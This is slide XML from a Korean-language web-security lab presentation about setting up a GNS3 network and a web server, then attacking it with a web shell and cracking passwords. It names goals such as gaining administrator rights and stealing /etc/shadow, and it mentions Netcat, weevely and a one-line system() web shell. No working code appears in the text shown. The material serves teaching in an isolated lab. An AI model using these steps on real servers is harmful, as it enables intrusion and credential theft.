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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="272" r:id="rId2"/>
    <p:sldId id="271" r:id="rId3"/>
    <p:sldId id="303" r:id="rId4"/>
    <p:sldId id="262" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="282" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="280" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="318" r:id="rId16"/>
    <p:sldId id="319" r:id="rId17"/>
    <p:sldId id="320" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="287" r:id="rId20"/>
    <p:sldId id="304" r:id="rId21"/>
    <p:sldId id="275" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="306" r:id="rId24"/>
    <p:sldId id="307" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="309" r:id="rId27"/>
    <p:sldId id="310" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="311" r:id="rId30"/>
    <p:sldId id="312" r:id="rId31"/>
    <p:sldId id="313" r:id="rId32"/>
    <p:sldId id="314" r:id="rId33"/>
    <p:sldId id="315" r:id="rId34"/>
    <p:sldId id="316" r:id="rId35"/>
    <p:sldId id="317" r:id="rId36"/>
    <p:sldId id="276" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="322" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="324" r:id="rId41"/>
    <p:sldId id="325" r:id="rId4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hee0" initials="e" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="ehee0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4E5F"/>
    <a:srgbClr val="B7D7D8"/>
    <a:srgbClr val="EDF7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45" autoAdjust="0"/>
    <p:restoredTop sz="86375" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="61" d="100"/>
          <a:sy n="61" d="100"/>
        </p:scale>
        <p:origin x="288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3246"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="2299" y="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437072-8A57-4D8F-8E5E-706A18DAD831}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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FC8E30-6D6C-44F2-A0D6-F7FABD7E33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7565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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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3902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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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6926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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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2589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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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4208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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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9447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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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9944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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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072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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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1922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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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0641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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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9497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53EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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3053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dotGrid">
          <a:fgClr>
            <a:srgbClr val="B7D7D8"/>
          </a:fgClr>
          <a:bgClr>
            <a:srgbClr val="EDF7F5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053EB0-527D-4C67-B9EE-33D40AF6BC98}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2020-11-20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B3696-2A62-466A-924E-3A46F76035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8284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BB2DB40D-D024-43AA-9F8F-F8B80E87B0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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6464" y="3726865"/>
            <a:ext cx="5485072" cy="5270500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Ⅰ. GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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세팅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Ⅱ. Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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세팅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Ⅲ. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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공격</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Ⅳ. Password Cracking</a:t>
            </a:r>
          </a:p>
          <a:p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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Ⅴ. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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마무리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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BB3C9497-C751-49D4-9613-0F131DD31C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="254003" y="241297"/>
            <a:ext cx="2880000" cy="2880000"/>
            <a:chOff x="1256523" y="234901"/>
            <a:chExt cx="2880000" cy="2880000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="눈물 방울 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D435771-E4CD-4066-A538-704A12BF0D5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1256523" y="234901"/>
              <a:ext cx="2880000" cy="2880000"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="204E5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08D5980-5461-46B5-A7AA-DA930ED5FAC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505107" y="1290180"/>
              <a:ext cx="238283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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                  <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                </a:rPr>
                <a:t>INDEX</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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457697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C3661A93-3991-4913-94F3-62BD06023FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="사각형: 둥근 위쪽 모서리 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4970B356-884D-4505-A465-39E0CB9344B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092274C3-3F70-4386-A0E3-60BF0C5FEED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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BB863F2B-21ED-448C-B9E9-BA83394EBDB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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제목 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435FE9A8-9CE6-4A55-BED9-90ACB77D5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914401"/>
            <a:ext cx="5915025" cy="719099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>실습 환경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65F6B49-F820-42BB-BBF5-01A3A04129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1488" y="1968498"/>
            <a:ext cx="2914650" cy="3517889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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공격 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PC :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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CentOS7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Ubuntu</a:t>
            </a:r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7B14E246-3735-4402-8A45-4F2559D8CA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71863" y="1968498"/>
            <a:ext cx="2914650" cy="3517895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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타겟 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PC :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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CentOS7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Ubuntu</a:t>
            </a:r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" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327F7D4A-350A-43E4-A540-6A82E06AA6A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3459509" y="3841944"/>
            <a:ext cx="2914650" cy="3385083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85800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Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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최소 조건 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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로그인 가능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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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sz="2000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파일 업로드 가능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+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCA09E0-4278-411C-9A24-18190839E957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557212" y="3861265"/>
            <a:ext cx="5829300" cy="5619619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85800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sz="2000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필요 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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ko-KR" sz="2000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Apache2 (Kali) or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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ko-KR" sz="2000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Httpd (CentOS7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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sz="2000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*PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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en-US" altLang="ko-KR" sz="2000" dirty="0" err="1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Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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프로그램이 없다면 방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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번을 사용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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 **</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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 sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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sz="2000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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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공격실습을 할 동안은 혹시 모를 위험</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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sz="2000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공격이 다른 네트워크로 넘어가는 상황</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000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에 대비하여 인터넷을 연결시키지 않았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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  <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="685800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2000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목적 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1850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관리자 권한 탈취</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1850" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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685800" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1850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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1850" dirty="0" err="1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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1850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/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1850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파일 탈취</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1850" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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83731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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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공격자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PC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에서 먼저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Web Shell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스크립트를 만들어준다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처음엔 제일 간단한 한 줄 스크립트로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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cmd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뒤에 오는 문장을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system()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함수에 넣어준다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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칼리를 사용한다면 내장 프로그램인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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weevely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를 사용할 수 있다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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관리자 권한 상승 스크립트를 생성한다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
